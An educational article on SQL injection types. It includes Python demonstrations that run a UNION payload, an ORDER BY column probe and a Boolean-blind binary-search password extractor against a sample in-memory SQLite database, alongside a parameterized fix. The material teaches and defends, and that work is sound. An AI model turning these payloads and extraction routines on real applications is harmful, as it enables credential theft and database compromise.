What is SQL injection, and what are its types? These are common questions, and this article answers both.
What is SQL Injection:
SQL Injection is considered one of the most significant threats to web applications; the 2017 edition of the OWASP Top 10 lists Injection as its number one category. SQL Injection happens when user input is concatenated into a database query instead of being passed as a bound parameter or strictly validated, so the attacker's input is interpreted as part of the SQL statement. An attacker can exploit this to read information from the database, such as user credentials and other sensitive data, or to change it.
Impact of SQL Injection:
The impact of a successful SQL Injection attack can be enormous. By exploiting SQL injection, an attacker can modify or even drop the entire database, which has the same effect on the application as a denial-of-service (DoS) attack. Some outcomes of SQL Injection are as follows:
- Where the database server exposes dangerous features (such as command-execution stored procedures or writing files to disk), an attacker can escalate to remote code execution and compromise the server.
- An attacker can update or delete the database.
- An attacker can retrieve sensitive information such as credit card information, user credentials, and other personally identifiable information.
- An attacker can deface a website to cause reputation loss.
- Bypass login pages to gain access as any application user.
Types of SQL Injection:
There are three common types of SQL Injection, each further divided into sub-categories. These three types are
- In-Band SQL Injection
- Blind SQL Injection
- Out of Band SQL Injection
In-Band SQL Injection:
In-Band SQL Injection is the most common type of SQL Injection and the easiest to exploit. The attacker uses the same communication channel, the HTTP request and its response, both to inject the payload and to read back the database results, so the attack does not depend on any external factors. It is further divided into two sub-types, namely Union-based and Error-based SQL Injection.
- Union-based SQL Injection:
Union-based SQL Injection leverages the UNION operator to append the result of an attacker-chosen SELECT statement to the application's own query, so the stolen rows are returned in the normal HTTP response. The injected SELECT must return the same number of columns as the original query (and, on strict database engines, compatible types), so the attacker first determines the column count, typically with ORDER BY n probes or UNION SELECT NULL,NULL,... payloads, before selecting the data of interest.
- Error based SQL Injection:
In error-based SQL Injection, the attacker relies on database error messages returned in the response to identify the vulnerability. Once the application echoes a database error, the attacker can use it to understand the structure of the underlying query and then craft payloads that deliberately trigger errors containing the data they want, such as the database name, table names, column names, and raw row contents.
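The two in-band variants above, as an added example that is not part of the original article: a Python script against an in-memory SQLite database (constructed sample data, with assumed table and column names) whose search function splices the user's term into the query. An ORDER BY probe leaks the column count through the database's own error text (error-based), a UNION payload then returns the users table inside the normal search response (union-based), and a parameterized version of the same search shows the payload doing nothing.

```python
import sqlite3

# Constructed sample database (not from the article): one table the
# application searches and one holding credentials it never meant to expose.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, price TEXT);
        INSERT INTO products VALUES ('keyboard', '49'), ('mouse', '19');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn

def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # Vulnerable: the search term is spliced straight into the SQL text.
    query = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(query).fetchall()

def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    # Hardened: the driver sends the term as a bound value, never as SQL.
    query = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(query, (f"%{term}%",)).fetchall()

def probe_column_count(conn: sqlite3.Connection, max_cols: int = 10) -> tuple:
    """Error-based step: ORDER BY n is valid until n exceeds the number of
    columns in the original SELECT. The first failing n reveals the count,
    and the error text the database produces leaks it as well."""
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(conn, f"%' ORDER BY {n}--")
        except sqlite3.OperationalError as exc:
            return n - 1, str(exc)
    return max_cols, ""

# Two columns in the attacker's SELECT to match the two in the original query;
# the trailing -- comments out the application's closing quote.
UNION_PAYLOAD = "%' UNION SELECT username, password FROM users--"

def union_dump(conn: sqlite3.Connection) -> list:
    # In-band: the stolen rows come back in the ordinary search response.
    return search_vulnerable(conn, UNION_PAYLOAD)

if __name__ == "__main__":
    conn = build_db()
    cols, err = probe_column_count(conn)
    print(f"original query has {cols} columns; DB error said: {err!r}")
    print("vulnerable search returns:", union_dump(conn))
    print("parameterized search returns:", search_parameterized(conn, UNION_PAYLOAD))
```

The parameterized variant is the fix the rest of the article implies: the same payload is now just an (unmatched) search string, because the database receives the SQL and the value separately.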
Blind SQL Injection:
Blind SQL Injection occurs when the vulnerability exists but the application returns neither query results nor database error messages. Developers often suppress error messages as a hardening measure, but this hides the symptom rather than fixing the flaw, and the injection frequently remains exploitable. The attacker instead infers data from indirect signals: time delays and differences in the page's true/false (Boolean) behaviour. Manual exploitation of Blind SQL Injection is slow, but once the correct injection syntax is identified, automation can extract the entire database reasonably quickly.
- Time-based Blind SQLi:
The attacker uses database delay functions such as MySQL's SLEEP(seconds) and BENCHMARK(count, expr), PostgreSQL's pg_sleep(seconds), or SQL Server's WAITFOR DELAY 'hh:mm:ss' to identify the vulnerability. The delay is made conditional on a statement about the data (for example, "is the first character of the admin password greater than 'm'?"), so whether the response is delayed tells the attacker whether the condition was true, one bit per request. The advantage of time-based Blind SQLi is that it needs neither error messages nor any visible difference in page content. It does not, however, avoid logging: every injected request still appears in the web server and database logs.
- Boolean based Blind SQLi:
In Boolean-based Blind SQLi, the attacker injects conditions that make the query return a row or no row and reads the answer from the response (for example, the page renders normally or shows "not found"). Each request yields one bit, so retrieving the complete database contents takes many requests, but the process is easily automated.
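The Boolean-based technique above, as an added example that is not part of the original article: a Python script against an in-memory SQLite database (constructed sample data, with assumed table and column names) whose only output is whether a product exists. That yes/no signal is turned into an oracle for arbitrary SQL conditions and used to recover the admin password with a binary search over the length and then over each character's code point, which needs about seven requests per character instead of one per candidate. A time-based attack uses exactly the same search, swapping the page difference for a conditional SLEEP()/pg_sleep()/WAITFOR DELAY; SQLite has no delay function, so that variant is not shown.

```python
import sqlite3

# Constructed sample database (not from the article).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT);
        INSERT INTO products VALUES ('keyboard'), ('mouse');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cr3t!');
    """)
    return conn

def product_exists(conn: sqlite3.Connection, name: str) -> bool:
    # Vulnerable endpoint: it reveals only whether a row matched, returning
    # no data and no error text, which is all a Boolean-based attack needs.
    query = f"SELECT 1 FROM products WHERE name = '{name}'"
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # errors are suppressed, as the article describes

def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    # 'x' matches no product, so the result is non-empty exactly when the
    # injected condition is true; the -- comments out the closing quote.
    return product_exists(conn, f"x' OR ({condition})--")

# Subquery for the value being extracted (assumed schema).
SECRET = "(SELECT password FROM users WHERE username = 'admin')"

def find_length(conn: sqlite3.Connection, max_len: int = 64) -> int:
    # Binary search: smallest n for which length(secret) > n is false.
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, f"length({SECRET}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo

def find_char(conn: sqlite3.Connection, pos: int) -> str:
    # Binary search over printable ASCII code points (32..126) for one position.
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, f"unicode(substr({SECRET}, {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

def extract_secret(conn: sqlite3.Connection) -> str:
    length = find_length(conn)
    return "".join(find_char(conn, i) for i in range(1, length + 1))

if __name__ == "__main__":
    conn = build_db()
    print("admin password recovered via yes/no responses:", extract_secret(conn))
```

Note that the endpoint never returns any column from users; the data leaks purely through the one bit of state the page exposes, which is why suppressing error messages does not make such an endpoint safe.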
Out of Band SQL Injection:
This category of SQL Injection is less common because it relies on features of the database server used by the web application, such as the ability to initiate outbound network connections, which are not always enabled. It is usually attempted only after In-Band and Blind SQL Injection have proven impractical, for example when the response reflects no data and timing is too unreliable to read.
Out of Band SQL Injection relies on the database server's ability to make DNS or HTTP requests to an attacker-controlled host; SQL Server's xp_dirtree (which resolves UNC paths) and Oracle's UTL_HTTP and UTL_INADDR packages are typical vehicles. Common examples of Out of Band exploitation are DNS-based and HTTP-based exfiltration, where the stolen data is encoded into the hostname or URL of the outbound request and read from the attacker's server logs.
This article covers the basic but most important concepts of SQL injection; the exploitation techniques for each type are covered in the next sections.